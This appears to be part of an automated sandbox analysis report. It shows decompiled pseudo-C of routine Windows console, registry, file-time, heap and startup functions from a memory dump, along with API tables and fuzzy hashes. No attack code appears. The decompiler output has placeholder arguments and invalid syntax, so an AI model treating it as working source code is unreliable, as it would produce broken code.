                                0x4a55d984

                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: wcstol$lstrcmp
                                • String ID:
                                • API String ID: 3515581199-0
                                • Opcode ID: d73097980db981250a9b5e5464445af2c6ac7786e63d52b4c8e83d95e7ce580e
                                • Instruction ID: 85a5c9d7b5fa72e0385b995a61f61e77944eedcfb240a5adb6e23276f236eee9
                                • Opcode Fuzzy Hash: d73097980db981250a9b5e5464445af2c6ac7786e63d52b4c8e83d95e7ce580e
                                • Instruction Fuzzy Hash: B321D8B7226615BBE799D675CE5166A7ABCAF02374F40442BE502D28ACEB60ED008790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A555932, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                Download Yara Rule
                                C-Code - Quality: 21%
                                			E4A555932(short* _a4, char _a8) {
				signed int _v8;
				void* __ecx;
				void* _t12;
				signed int _t13;
				void* _t14;
				long _t17;
				void* _t28;
				long _t38;

				_push(_t28);
				_v8 = _v8 & 0x00000000;
				_t38 = _a8;
				if(_t38 <= 0) {
					L4:
					_t13 = _v8;
					L5:
					return _t13;
				}
				_t14 = E4A554490(_t12, 1);
				_t15 =  &_a8;
				if(_t14 != 0) {
					__imp___get_osfhandle(1, _a4, _t38, _t15, 0);
					_pop(_t28);
					if(WriteConsoleW(_t15, ??, ??, ??, ??) != 0) {
						L3:
						if(_a8 != _t38) {
							L9:
							_t17 = GetLastError();
							_v8 = _t17;
							if(_t17 == 0) {
								_v8 = 0x70;
							}
							if(E4A553B03(_t17, _t28, 1) == 0) {
								if(E4A556BEA(_t18, 1) == 0) {
									E4A56056B(_v8);
								} else {
									_push(0);
									_push(0x2364);
									E4A556D44(_t28);
								}
								_t13 = 1;
								goto L5;
							}
							_push(0);
							_push(0x1d);
							E4A556D44(_t28);
						}
						goto L4;
					}
					GetLastError();
					goto L9;
				}
				_t38 = _t38 + _t38;
				if(E4A55453E( &_a8, 1, _a4, _t38,  &_a8) == 0) {
					goto L9;
				}
				goto L3;
			}











                                0x4a555937
                                0x4a555938
                                0x4a55593e
                                0x4a555944
                                0x4a55597e
                                0x4a55597e
                                0x4a555981
                                0x4a555985
                                0x4a555985
                                0x4a55594a
                                0x4a555957
                                0x4a55595a
                                0x4a556de7
                                0x4a556ded
                                0x4a556df7
                                0x4a555975
                                0x4a555978
                                0x4a569e3a
                                0x4a569e3a
                                0x4a569e3c
                                0x4a569e41
                                0x4a569e43
                                0x4a569e43
                                0x4a569e52
                                0x4a569e6c
                                0x4a569e86
                                0x4a569e6e
                                0x4a569e6e
                                0x4a569e70
                                0x4a569e75
                                0x4a569e7b
                                0x4a569e7c
                                0x00000000
                                0x4a569e7c
                                0x4a569e54
                                0x4a569e56
                                0x4a569e58
                                0x4a569e5e
                                0x00000000
                                0x4a555978
                                0x4a569e38
                                0x00000000
                                0x4a569e38
                                0x4a555961
                                0x4a55596f
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                  • Part of subcall function 4A554490: _get_osfhandle.MSVCRT ref: 4A55449A
                                  • Part of subcall function 4A554490: GetFileType.KERNEL32 ref: 4A5544A9
                                • _get_osfhandle.MSVCRT ref: 4A556DE7
                                • WriteConsoleW.KERNEL32 ref: 4A556DEF
                                • GetLastError.KERNEL32(?,4A564FE5,%s %s ,?,?), ref: 4A569E38
                                • GetLastError.KERNEL32(?,4A564FE5,%s %s ,?,?), ref: 4A569E3A
                                  • Part of subcall function 4A55453E: _get_osfhandle.MSVCRT ref: 4A554550
                                  • Part of subcall function 4A55453E: WideCharToMultiByte.KERNEL32(00000000,?,000000FF,4A576640,00002000,00000000,00000000,00000001,?,?,4A55596D,00000001,?,?,?,00000001), ref: 4A55459B
                                  • Part of subcall function 4A55453E: WriteFile.KERNEL32(?,4A576640,-00000001,4A564FE5,00000000), ref: 4A5545AE
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _get_osfhandle$ErrorFileLastWrite$ByteCharConsoleMultiTypeWide
                                • String ID:
                                • API String ID: 3517615490-0
                                • Opcode ID: 50950998f89c86b03748da14de5e14e6598de8e7a13e3b9f7382c2d74aff6f6d
                                • Instruction ID: 8ae9598bd47b1d79c8f86258e763fe91897df0988922432036657ecfce583f17
                                • Opcode Fuzzy Hash: 50950998f89c86b03748da14de5e14e6598de8e7a13e3b9f7382c2d74aff6f6d
                                • Instruction Fuzzy Hash: F211AF72641205F6EB226A61DF44BAF3BBCDF826B4F10411BF908EA088DB74DE41D664
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56D003, Relevance: 6.1, APIs: 4, Instructions: 73registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 78%
                                			E4A56D003(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				short* _t21;
				long _t24;
				char* _t35;
				void* _t36;
				long _t40;
				void* _t43;

				_push(0x14);
				_push(0x4a56d0d8);
				E4A55264A(__ebx, __edi, __esi);
				 *(_t43 - 0x20) = 0;
				 *(_t43 - 0x24) = 0;
				_t36 =  *(_t43 + 8);
				 *(_t43 - 0x1c) = _t36;
				 *((intOrPtr*)(_t43 - 4)) = 0;
				_t21 =  *(_t43 + 0xc);
				if(_t21 == 0 ||  *_t21 == 0) {
					L4:
					_t24 = RegQueryValueExW( *(_t43 - 0x1c), 0, 0, _t43 + 0xc, 0, _t43 - 0x24);
					if(_t24 != 2) {
						if(_t24 != 0) {
							goto L3;
						} else {
							_t35 = E4A551896( *(_t43 - 0x24));
							 *(_t43 - 0x20) = _t35;
							if(_t35 == 0) {
								_push(8);
								goto L11;
							} else {
								_t40 = RegQueryValueExW( *(_t43 - 0x1c), 0, 0, _t43 + 0xc, _t35, _t43 - 0x24);
								if(_t40 != 0) {
									E4A55142E(_t35);
									 *(_t43 - 0x20) = 0;
									_push(_t40);
									goto L11;
								}
							}
						}
					} else {
						 *(_t43 - 0x20) = E4A5519D6(E4A553AFC);
					}
				} else {
					_t24 = RegOpenKeyExW(_t36, _t21, 0, 1, _t43 - 0x1c);
					if(_t24 == 0) {
						goto L4;
					} else {
						L3:
						_push(_t24);
						L11:
						SetLastError();
					}
				}
				 *((intOrPtr*)(_t43 - 4)) = 0xfffffffe;
				E4A56D0C7();
				return E4A5513B6( *(_t43 - 0x20));
			}









                                0x4a56d003
                                0x4a56d005
                                0x4a56d00a
                                0x4a56d011
                                0x4a56d014
                                0x4a56d017
                                0x4a56d01a
                                0x4a56d01d
                                0x4a56d020
                                0x4a56d025
                                0x4a56d042
                                0x4a56d056
                                0x4a56d05b
                                0x4a56d06e
                                0x00000000
                                0x4a56d070
                                0x4a56d078
                                0x4a56d07a
                                0x4a56d07f
                                0x4a56d0a3
                                0x00000000
                                0x4a56d081
                                0x4a56d091
                                0x4a56d095
                                0x4a56d098
                                0x4a56d09d
                                0x4a56d0a0
                                0x00000000
                                0x4a56d0a0
                                0x4a56d095
                                0x4a56d07f
                                0x4a56d05d
                                0x4a56d067
                                0x4a56d067
                                0x4a56d02c
                                0x4a56d035
                                0x4a56d03d
                                0x00000000
                                0x4a56d03f
                                0x4a56d03f
                                0x4a56d03f
                                0x4a56d0a5
                                0x4a56d0a5
                                0x4a56d0a5
                                0x4a56d03d
                                0x4a56d0ab
                                0x4a56d0b2
                                0x4a56d0bf

                                APIs
                                • RegOpenKeyExW.KERNEL32 ref: 4A56D035
                                • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,?), ref: 4A56D056
                                • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,?), ref: 4A56D08F
                                • SetLastError.KERNEL32(00000000), ref: 4A56D0A5
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: QueryValue$ErrorLastOpen
                                • String ID:
                                • API String ID: 4270309053-0
                                • Opcode ID: 9379b6f41ac3b3d8da7b502712b94f5d474a86101636ac4887071ba80f1209b7
                                • Instruction ID: 7c87a0ec776a1b9827988516ac02f67e8a4e034d1a87cae1d99cbc9539a2a986
                                • Opcode Fuzzy Hash: 9379b6f41ac3b3d8da7b502712b94f5d474a86101636ac4887071ba80f1209b7
                                • Instruction Fuzzy Hash: 032150B2902119BBCB21EB90CE44CEE7FBCFF89760B114916F409F6119E7748941CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A561BE3, Relevance: 6.1, APIs: 4, Instructions: 66filetimeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 39%
                                			E4A561BE3(intOrPtr _a4, char _a8, FILETIME* _a12, intOrPtr _a16) {
				char _v8;
				void* __ecx;
				void* _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t24;
				char _t27;
				FILETIME* _t30;
				intOrPtr* _t33;

				_t27 = _a8;
				_t13 =  *((intOrPtr*)(_t27 + 0x20));
				_v8 = 0x1a;
				if( *((intOrPtr*)(_t27 + 0x20)) == 0) {
					_t13 = _t27;
				}
				_t14 = E4A561C6C(_t13);
				_t30 = _a12;
				_t33 = __imp___get_osfhandle;
				if(_t14 != 0) {
					_t15 = E4A553B03(_t14, _t27, _t30);
					if(_t15 == 0) {
						_t24 =  *_t33( &_v8, 1,  &_a8, _t15);
						_t27 = _t30;
						WriteFile(_t24, ??, ??, ??, ??);
					}
				}
				_t16 = _a4;
				if(_t16 != 0 && ( *(_t16 + 0x1c) & 0x00000080) == 0 && E4A553B03(_t16, _t27, _t30) == 0) {
					_t19 =  *0x4a574168; // 0x0
					if(_t19 != 3 && _a16 != 0 && _t19 != 2) {
						SetFileTime( *_t33(_a16), _t30, 0, 0);
					}
				}
				_t17 = E4A553AB3(_t30);
				 *0x4a574164 =  *0x4a574164 + 1;
				return _t17;
			}














                                0x4a561be9
                                0x4a561bec
                                0x4a561bef
                                0x4a561bf8
                                0x4a568719
                                0x4a568719
                                0x4a561c01
                                0x4a561c06
                                0x4a561c09
                                0x4a561c11
                                0x4a568721
                                0x4a568728
                                0x4a56873a
                                0x4a56873c
                                0x4a56873e
                                0x4a56873e
                                0x4a568728
                                0x4a561c17
                                0x4a561c1c
                                0x4a561c2e
                                0x4a561c36
                                0x4a561c4f
                                0x4a561c4f
                                0x4a561c36
                                0x4a561c56
                                0x4a561c5b
                                0x4a561c64

                                APIs
                                • _get_osfhandle.MSVCRT ref: 4A561C4B
                                • SetFileTime.KERNEL32(00000000,?,4A5694D2,?,?,000000FF,00000000), ref: 4A561C4F
                                • _get_osfhandle.MSVCRT ref: 4A56873A
                                • WriteFile.KERNEL32(00000000,?,4A5694D2,?,?), ref: 4A56873E
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File_get_osfhandle$TimeWrite
                                • String ID:
                                • API String ID: 4019809305-0
                                • Opcode ID: a77162b052015e2eba878fae8f265670f19353e9718787c68675eb6f2554e10f
                                • Instruction ID: 8854117c6015fc6154454c32e596abd1008d3da815b09610178dc7e8efc5f336
                                • Opcode Fuzzy Hash: a77162b052015e2eba878fae8f265670f19353e9718787c68675eb6f2554e10f
                                • Instruction Fuzzy Hash: 80116D71202209AAEB11AE61CF48BBF3B7CEF86764F010016F90AD7196DB30D951D761
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56F619, Relevance: 6.1, APIs: 4, Instructions: 60fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 42%
                                			E4A56F619(intOrPtr _a4, intOrPtr _a8, char _a12, WCHAR* _a16, intOrPtr _a20) {
				void* _t10;
				int _t11;
				void* _t19;
				void* _t20;
				char _t22;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t28;

				_t22 = _a12;
				_t10 =  &_a12;
				_t19 = 0;
				__imp___get_osfhandle(_a4, _a8, _t22, _t10, 0);
				_pop(_t20);
				_t11 = WriteFile(_t10, ??, ??, ??, ??);
				if(_t11 == 0 || _t22 != _a12) {
					L3:
					 *0x4a574128 = GetLastError();
					E4A553AB3(_a20);
					if(E4A553B03(E4A553AB3(_a4), _t20, _a4) == 0) {
						DeleteFileW(_a16);
					} else {
						_t19 = 0x1d;
					}
					 *0x4a574120 = 0;
					_t27 =  *0x4a574128; // 0x0
					if(_t27 == 0) {
						 *0x4a574128 = 0x70;
					}
					_t28 =  *0x4a5741b4; // 0x0
					if(_t28 == 0) {
						if(_t19 == 0) {
							E4A56056B( *0x4a574128);
						}
					} else {
						_t19 = 0;
					}
					return L4A56F2D7(_t20, _t19, 1);
				} else {
					_t25 =  *0x4a5741b4; // 0x0
					if(_t25 == 0) {
						return _t11;
					}
					goto L3;
				}
			}











                                0x4a56f620
                                0x4a56f627
                                0x4a56f62f
                                0x4a56f634
                                0x4a56f63a
                                0x4a56f63c
                                0x4a56f644
                                0x4a56f653
                                0x4a56f65c
                                0x4a56f661
                                0x4a56f678
                                0x4a56f682
                                0x4a56f67a
                                0x4a56f67c
                                0x4a56f67c
                                0x4a56f688
                                0x4a56f68e
                                0x4a56f694
                                0x4a56f696
                                0x4a56f696
                                0x4a56f6a0
                                0x4a56f6a6
                                0x4a56f6ae
                                0x4a56f6b6
                                0x4a56f6b6
                                0x4a56f6a8
                                0x4a56f6a8
                                0x4a56f6a8
                                0x00000000
                                0x4a56f64b
                                0x4a56f64b
                                0x4a56f651
                                0x4a56f6c7
                                0x4a56f6c7
                                0x00000000
                                0x4a56f651

                                APIs
                                • _get_osfhandle.MSVCRT ref: 4A56F634
                                • WriteFile.KERNEL32(00000000,4A569439,000000FF,?,?), ref: 4A56F63C
                                • GetLastError.KERNEL32 ref: 4A56F653
                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 4A56F682
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                • String ID:
                                • API String ID: 2448200120-0
                                • Opcode ID: 0db9d055f8e6998cfea0b8be33e53edaec00557eb221081f6767eee69118562e
                                • Instruction ID: 691671b88cd158e1eb1d290df7cd3deca98a0b0b6a6d8f71ef4c79ccb6c80033
                                • Opcode Fuzzy Hash: 0db9d055f8e6998cfea0b8be33e53edaec00557eb221081f6767eee69118562e
                                • Instruction Fuzzy Hash: F5119AB2A40205AFDB12AF61CF8499A3F7DEB95365F11012BF909E54B4CB318858CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55839B, Relevance: 6.1, APIs: 4, Instructions: 60sleepCOMMON
                                Download Yara Rule
                                C-Code - Quality: 60%
                                			E4A55839B(void* __eax, long __ebx, void* __edx, LONG* __edi, long __esi) {
				long _t13;
				intOrPtr _t14;
				intOrPtr _t15;
				void* _t16;
				int _t17;
				int _t18;
				intOrPtr* _t20;
				intOrPtr _t23;
				void* _t24;
				long _t25;
				void* _t26;
				intOrPtr _t28;
				LONG* _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				void* _t51;
				void* _t52;

				_t35 = __esi;
				_t34 = __edi;
				_t25 = __ebx;
				[far dword [edx]();
				while(1) {
					__eflags = _t13 - _t35;
					if(__eflags == 0) {
						break;
					}
					Sleep(0x3e8);
					_t13 = InterlockedCompareExchange(_t34, _t35, _t25);
					if(_t13 != _t25) {
						continue;
					} else {
						_t37 = 1;
					}
					L3:
					_t14 =  *0x4a574200; // 0x0
					if(_t14 == _t37) {
						L4A572309();
						_t26 = 0x1f;
						goto L6;
					} else {
						_t23 =  *0x4a574200; // 0x0
						if(_t23 != 0) {
							 *0x4a59090c = _t37;
							goto L6;
						} else {
							 *0x4a574200 = _t37;
							_t24 = E4A558271(0x4a558378, 0x4a558384);
							_pop(_t26);
							if(_t24 != 0) {
								 *((intOrPtr*)(_t39 - 4)) = 0xfffffffe;
								_t18 = 0xff;
								goto L25;
							} else {
								L6:
								_t15 =  *0x4a574200; // 0x0
								if(_t15 == _t37) {
									_push(0x4a558374);
									L4A557C76();
									_t26 = 0x4a55836c;
									 *0x4a574200 = 2;
								}
								if( *((intOrPtr*)(_t39 - 0x1c)) == _t25) {
									InterlockedExchange(_t34, _t25);
								}
								_t51 =  *0x4a590688 - _t25; // 0x0
								if(_t51 != 0) {
									_t16 = E4A57227C(_t25, _t34, _t37, __eflags);
									_t26 = 0x4a590688;
									__eflags = _t16;
									if(_t16 != 0) {
										 *0x4a590688(_t25, 2, _t25);
									}
								}
								_push( *0x4a57423c);
								_push( *0x4a574240);
								_push( *0x4a574238);
								_t17 = L4A557308(_t26, _t34, _t37);
								 *0x4a574274 = _t17;
								_t52 =  *0x4a574138 - _t25; // 0x0
								if(_t52 != 0) {
									__eflags =  *0x4a59090c - _t25; // 0x0
									if(__eflags == 0) {
										__imp___cexit();
									}
									 *((intOrPtr*)(_t39 - 4)) = 0xfffffffe;
									_t18 =  *0x4a574274; // 0x0
									L25:
									return E4A5513B6(_t18);
								} else {
									exit(_t17);
									_t20 =  *((intOrPtr*)(_t39 - 0x14));
									_t28 =  *((intOrPtr*)( *_t20));
									 *((intOrPtr*)(_t39 - 0x20)) = _t28;
									_push(_t20);
									_push(_t28);
									L4A5721EE();
									return _t20;
								}
							}
						}
					}
				}
				_t37 = 1;
				 *((intOrPtr*)(_t39 - 0x1c)) = 1;
				goto L3;
			}





















                                0x4a55839b
                                0x4a55839b
                                0x4a55839b
                                0x4a55839b
                                0x4a5583a4
                                0x4a5583a4
                                0x4a5583a6
                                0x00000000
                                0x00000000
                                0x4a5583b8
                                0x4a5582c4
                                0x4a5582cc
                                0x00000000
                                0x4a5582d2
                                0x4a5582d4
                                0x4a5582d4
                                0x4a5582d5
                                0x4a5582d5
                                0x4a5582dc
                                0x4a5583c5
                                0x4a5583ca
                                0x00000000
                                0x4a5582e2
                                0x4a5582e2
                                0x4a5582e9
                                0x4a558363
                                0x00000000
                                0x4a5582eb
                                0x4a5582eb
                                0x4a5582fb
                                0x4a558301
                                0x4a558304
                                0x4a5583d0
                                0x4a5583d7
                                0x00000000
                                0x4a55830a
                                0x4a55830a
                                0x4a55830a
                                0x4a558311
                                0x4a558313
                                0x4a55831d
                                0x4a558323
                                0x4a558324
                                0x4a558324
                                0x4a558331
                                0x4a558335
                                0x4a558335
                                0x4a55833b
                                0x4a558341
                                0x4a5583e6
                                0x4a5583eb
                                0x4a5583ec
                                0x4a5583ee
                                0x4a5583f8
                                0x4a5583f8
                                0x4a5583ee
                                0x4a558347
                                0x4a55834d
                                0x4a558353
                                0x4a558359
                                0x4a558406
                                0x4a55840b
                                0x4a558411
                                0x4a55844a
                                0x4a558450
                                0x4a558452
                                0x4a558452
                                0x4a558458
                                0x4a55845f
                                0x4a558464
                                0x4a558469
                                0x4a558413
                                0x4a558414
                                0x4a55841a
                                0x4a55841f
                                0x4a558421
                                0x4a558424
                                0x4a558425
                                0x4a558426
                                0x4a55842d
                                0x4a55842d
                                0x4a558411
                                0x4a558304
                                0x4a5582e9
                                0x4a5582dc
                                0x4a5583aa
                                0x4a5583ab
                                0x00000000

                                APIs
                                • InterlockedCompareExchange.KERNEL32(4A574204,?,00000000), ref: 4A5582C4
                                • _initterm.MSVCRT ref: 4A55831D
                                • InterlockedExchange.KERNEL32(4A574204,00000000), ref: 4A558335
                                • Sleep.KERNEL32(000003E8), ref: 4A5583B8
                                • exit.MSVCRT ref: 4A558414
                                • _XcptFilter.MSVCRT ref: 4A558426
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ExchangeInterlocked$CompareFilterSleepXcpt_inittermexit
                                • String ID:
                                • API String ID: 1487059562-0
                                • Opcode ID: 5ad28f1f0026f79f35e5f6244233d3de871af0936abf9adcea930c5787bc5bfb
                                • Instruction ID: 381d7ffc7663bf697162c22d00c1442a37f7c1025f88a62f490af452fcc076c4
                                • Opcode Fuzzy Hash: 5ad28f1f0026f79f35e5f6244233d3de871af0936abf9adcea930c5787bc5bfb
                                • Instruction Fuzzy Hash: CF1149B8905201DFE7469F64EF80A293FB8BB46715F11081BF502EA56CDB319C50AB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A552536, Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 57%
                                			E4A552536(void* _a4, intOrPtr _a8) {
				void* _t18;
				void* _t20;
				void* _t22;
				void* _t25;
				long _t26;

				_t11 = _a8;
				_t22 = _a4 + 0xfffffff8;
				_t3 = _t11 + 8; // 0x8
				_t26 = _t3;
				_a4 = _t22;
				if(_t26 < _a8) {
					L12:
					_push(0);
					_push(8);
					E4A556D44(_t22);
					return 0;
				}
				_t20 = HeapReAlloc(GetProcessHeap(), 0, _t22, _t26);
				if(_t20 == 0) {
					goto L12;
				}
				 *_t20 = _t26;
				HeapSize(GetProcessHeap(), 0, _t20);
				if(_t20 != _a4) {
					_t18 =  *0x4a574100; // 0x0
					if(_t18 != _a4) {
						while(_t18 != 0) {
							_t25 =  *(_t18 + 4);
							if(_t25 == _a4) {
								 *(_t18 + 4) = _t20;
								goto L3;
							}
							_t18 = _t25;
						}
						goto L3;
					}
					 *0x4a574100 = _t20;
				}
				L3:
				_t6 = _t20 + 8; // 0x8
				return _t6;
			}








                                0x4a55253b
                                0x4a552544
                                0x4a552547
                                0x4a552547
                                0x4a55254a
                                0x4a55254f
                                0x4a55e035
                                0x4a55e035
                                0x4a55e037
                                0x4a55e039
                                0x00000000
                                0x4a56777e
                                0x4a552568
                                0x4a55256c
                                0x00000000
                                0x00000000
                                0x4a552575
                                0x4a55257a
                                0x4a552583
                                0x4a554e66
                                0x4a554e6e
                                0x4a55e024
                                0x4a55e01a
                                0x4a55e020
                                0x4a55e02d
                                0x00000000
                                0x4a55e02d
                                0x4a55e022
                                0x4a55e022
                                0x00000000
                                0x4a55e028
                                0x4a554e74
                                0x4a554e74
                                0x4a552589
                                0x4a552589
                                0x00000000

                                APIs
                                • GetProcessHeap.KERNEL32(00000000,-000000F8,00000008,00000000,00000000,00000000,?,4A552520,00000000,00000000,00000000,?,4A552456,?,?,00000002), ref: 4A55255F
                                • HeapReAlloc.KERNEL32(00000000,?,4A552520,00000000,00000000,00000000,?,4A552456,?,?,00000002,00000000,00000000,00000000), ref: 4A552562
                                • GetProcessHeap.KERNEL32(00000000,00000000,?,4A552520,00000000,00000000,00000000,?,4A552456,?,?,00000002,00000000,00000000,00000000), ref: 4A552577
                                • HeapSize.KERNEL32(00000000,?,4A552520,00000000,00000000,00000000,?,4A552456,?,?,00000002,00000000,00000000,00000000), ref: 4A55257A
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$Process$AllocSize
                                • String ID:
                                • API String ID: 2549470565-0
                                • Opcode ID: f89c4a79412022ddb416f16e43588260871e61f3841301170e3d117dd8a1a27c
                                • Instruction ID: 3913f9267afd4ee60bdc1c71999c55787a3b87a0634bd262189eab367234b2c9
                                • Opcode Fuzzy Hash: f89c4a79412022ddb416f16e43588260871e61f3841301170e3d117dd8a1a27c
                                • Instruction Fuzzy Hash: 58119E71200206ABD7149F55EA94A5A3FA9EB45361F108517F909DF66CC770ED40CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A553B03, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                Download Yara Rule
                                C-Code - Quality: 22%
                                			E4A553B03(void* __eax, void* __ecx, intOrPtr _a4) {
				long _v8;
				intOrPtr _t13;
				void* _t17;
				void* _t18;
				void* _t24;
				void* _t25;

				__imp___get_osfhandle(_a4, _t24, __ecx);
				_t25 = __eax;
				if((GetFileType(__eax) & 0xffff7fff) == 2) {
					_t13 = _a4;
					if(_t13 == 0) {
						_push(0xfffffff6);
						goto L6;
					} else {
						_t18 = _t13 - 1;
						if(_t18 != 0) {
							if(_t18 == 1) {
								_push(0xfffffff4);
								goto L6;
							}
						} else {
							_push(0xfffffff5);
							L6:
							_t25 = GetStdHandle();
						}
					}
					if(GetConsoleMode(_t25,  &_v8) == 0) {
						 *0x4a574154 =  *0x4a574154 & 0x00000000;
					} else {
						if((_v8 & 0x00000007) == 0) {
							if((_v8 & 0x00000003) != 0) {
								 *0x4a574154 = 2;
							}
						} else {
							 *0x4a574154 = 1;
						}
					}
					_t17 = 1;
				} else {
					 *0x4a574154 =  *0x4a574154 & 0x00000000;
					_t17 = 0;
				}
				return _t17;
			}









                                0x4a553b0d
                                0x4a553b14
                                0x4a553b25
                                0x4a554a3e
                                0x4a554a41
                                0x4a5634c7
                                0x00000000
                                0x4a554a47
                                0x4a554a47
                                0x4a554a48
                                0x4a554b18
                                0x4a554b1e
                                0x00000000
                                0x4a554b1e
                                0x4a554a4e
                                0x4a554a4e
                                0x4a554a50
                                0x4a554a56
                                0x4a554a56
                                0x4a554a48
                                0x4a554a68
                                0x4a55d915
                                0x4a554a6e
                                0x4a554a72
                                0x4a5634d2
                                0x4a569da7
                                0x4a569da7
                                0x4a554a78
                                0x4a554a78
                                0x4a554a78
                                0x4a554a72
                                0x4a554a7e
                                0x4a553b2b
                                0x4a553b2b
                                0x4a553b32
                                0x4a553b32
                                0x4a553b36

                                APIs
                                • _get_osfhandle.MSVCRT ref: 4A553B0D
                                • GetFileType.KERNEL32 ref: 4A553B17
                                • GetStdHandle.KERNEL32(000000F4,?,4A569E50,00000001,?,4A564FE5,%s %s ,?,?), ref: 4A554A50
                                • GetConsoleMode.KERNEL32 ref: 4A554A5D
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ConsoleFileHandleModeType_get_osfhandle
                                • String ID:
                                • API String ID: 746850120-0
                                • Opcode ID: 93edb7e1a20c86fb212fb7ce79c34577b18f302611bc514775ee3f67f59090d0
                                • Instruction ID: 0b4ac351371184cfc5038adbd0e6c871e6249cda96dc6cc04c27febd2c0e2652
                                • Opcode Fuzzy Hash: 93edb7e1a20c86fb212fb7ce79c34577b18f302611bc514775ee3f67f59090d0
                                • Instruction Fuzzy Hash: C50108720191E4ABD7519755CB0C7DA7EBBEB02339F110227E425E25ECD7348E40C359
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A558761, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E4A558761() {
				signed int _t10;
				intOrPtr* _t13;
				intOrPtr* _t14;
				void* _t15;
				intOrPtr _t18;
				intOrPtr* _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t25;
				signed int _t26;
				void* _t28;
				intOrPtr _t32;

				_t28 =  *0x4a550000 - 0x5a4d; // 0x5a4d
				if(_t28 != 0) {
					L8:
					_t10 = 0;
				} else {
					_t18 =  *0x4a55003c; // 0xe8
					_t1 = _t18 + 0x4a550000; // 0x4550
					_t19 = _t1;
					if( *_t19 != 0x4550) {
						goto L8;
					} else {
						_t25 =  *(_t19 + 0x18) & 0x0000ffff;
						if(_t25 != 0x10b) {
							if(_t25 != 0x20b ||  *((intOrPtr*)(_t19 + 0x84)) <= 0xe) {
								goto L8;
							} else {
								_t26 = 0;
								goto L5;
							}
						} else {
							if( *((intOrPtr*)(_t19 + 0x74)) <= 0xe) {
								goto L8;
							} else {
								_t26 = 0;
								_t32 =  *((intOrPtr*)(_t19 + 0xe8));
								L5:
								_t10 = _t26 & 0xffffff00 | _t32 != 0x00000000;
							}
						}
					}
				}
				 *0x4a574138 = _t10;
				__set_app_type(E4A558823(1));
				 *0x4a5741f8 =  *0x4a5741f8 | 0xffffffff;
				 *0x4a5741fc =  *0x4a5741fc | 0xffffffff;
				_t13 = __p__fmode();
				_t22 =  *0x4a590684; // 0x0
				 *_t13 = _t22;
				_t14 = __p__commode();
				_t23 =  *0x4a590680; // 0x0
				 *_t14 = _t23;
				_t15 = E4A557C81();
				if( *0x4a590674 == 0) {
					__setusermatherr(E4A557C81);
				}
				E4A55880B(_t15);
				return 0;
			}















                                0x4a558766
                                0x4a55876d
                                0x4a558802
                                0x4a558802
                                0x4a558773
                                0x4a558773
                                0x4a558778
                                0x4a558778
                                0x4a558784
                                0x00000000
                                0x4a558786
                                0x4a558786
                                0x4a558790
                                0x4a56bc45
                                0x00000000
                                0x4a56bc58
                                0x4a56bc58
                                0x00000000
                                0x4a56bc5a
                                0x4a558796
                                0x4a55879a
                                0x00000000
                                0x4a55879c
                                0x4a55879c
                                0x4a55879e
                                0x4a5587a4
                                0x4a5587a7
                                0x4a5587a7
                                0x4a55879a
                                0x4a558790
                                0x4a558784
                                0x4a5587ab
                                0x4a5587b6
                                0x4a5587bc
